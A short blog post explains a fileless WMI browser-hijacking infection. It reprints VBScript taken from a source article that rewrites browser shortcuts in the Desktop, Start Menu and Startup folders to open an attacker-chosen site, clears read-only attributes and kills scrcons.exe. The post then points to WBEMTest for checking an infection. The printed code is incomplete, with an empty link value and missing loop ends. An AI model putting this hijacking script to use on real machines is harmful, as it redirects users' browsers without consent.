Fileless infection using wmi

Ok that sounds all sorts of wrong or confusing.

“Windows Management Instrumentation (WMI) is the Microsoft implementation of Web-Based Enterprise Management (WBEM), which is an industry initiative to develop a standard technology for accessing management information in an enterprise environment.” Credit

Still sounds a little like WTFunction?

Well think of WMI as a database for objects within windows.

Ok now we are done with that.

CODE in a VB script for infection (run in browser)

Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = ""
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
	BrowserDic.Add LCase(browser), browser
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\User\Desktop"
FoldersDic(5) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\User\AppData\Roaming\Roaming"
FoldersDic(9) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
	For Each file In fso.GetFolder(FoldersDic(i)).Files
		If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
			set oShellLink = WshShell.CreateShortcut(file.Path)
			path = oShellLink.TargetPath
			name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
			If BrowserDic.Exists(LCase(name)) Then
				oShellLink.Arguments = link
				If file.Attributes And 1 Then
					file.Attributes = file.Attributes - 1
				End If
			End If
		End If
createobject("").run "cmd /c taskkill /f /im scrcons.exe", 0

So what the heck? that is great code but how does this work or why?

Go to a website that has been compromised. Has a tiny little jscript or vbscript that runs in your browser.

In the code lifted from the source article shows the shortcut target adding an extra web site at the end thus making you go to a certain site because the shortcut is being told to.

starting WBEMTest we need to run it with administrator privileges. To do this, right click on the C:\Windows\System32\wbemtest.exe executable and then select Run as Administrator.  WBEMTest will now start.

This will help you to evaluate WMI infection that is spreading to your shortcuts.

This is nothing new but looks like its the next wave of spyware/hijackers to be concerned with.

This entry was posted in Interesting, Microsoft, Security. Bookmark the permalink.

Leave a Reply